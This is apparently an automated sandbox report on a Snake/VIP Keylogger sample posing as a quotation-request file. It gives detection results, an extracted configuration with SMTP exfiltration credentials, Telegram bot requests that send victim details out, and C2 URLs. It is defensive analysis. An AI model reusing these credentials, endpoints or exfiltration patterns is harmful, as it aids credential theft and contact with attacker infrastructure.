2024-11-21T12:20:21.655388+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49749	193.122.6.168	80	TCP
2024-11-21T12:20:23.624113+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49757	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587", "Version": "4.4"}
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49727 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49742 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 0741AF54h	0_2_0741B66D
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 0162F45Dh	9_2_0162F2C0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 0162F45Dh	9_2_0162F52F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 0162F45Dh	9_2_0162F4AC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 0162FC19h	9_2_0162F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DE31E0h	9_2_06DE2DC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DE0D0Dh	9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DE1697h	9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DE2C19h	9_2_06DE2968
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEE959h	9_2_06DEE6B0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEE0A9h	9_2_06DEDE00
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEF209h	9_2_06DEEF60
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DECF49h	9_2_06DECCA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DE31E0h	9_2_06DE2DC2
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DED7F9h	9_2_06DED550
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEE501h	9_2_06DEE258
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEF661h	9_2_06DEF3B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEEDB1h	9_2_06DEEB08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DED3A1h	9_2_06DED0F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06DE0040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEFAB9h	9_2_06DEF810
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DEDC51h	9_2_06DED9A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 4x nop then jmp 06DE31E0h	9_2_06DE310E
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0269F45Dh	14_2_0269F2D3
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0269F45Dh	14_2_0269F4AC
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0269FC19h	14_2_0269F974
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 06550D0Dh	14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 06551697h	14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 06552C19h	14_2_06552968
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 065531E0h	14_2_06552DC8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655E501h	14_2_0655E258
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06550673
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655E0A9h	14_2_0655DE00
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655E959h	14_2_0655E6B0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655F209h	14_2_0655EF60
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655EDB1h	14_2_0655EB08
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655F661h	14_2_0655F3B8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06550853
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06550040
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655FAB9h	14_2_0655F810
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655D3A1h	14_2_0655D0F8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655CF49h	14_2_0655CCA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655D7F9h	14_2_0655D550
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 065531E0h	14_2_0655310E
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 065531E0h	14_2_06552DC2
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 4x nop then jmp 0655DC51h	14_2_0655D9A8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49749 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49720 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49757 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49741 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49740 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49751 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49767 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49775 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49828 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49764 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49797 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49806 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49727 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49742 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 11:20:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 11:20:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
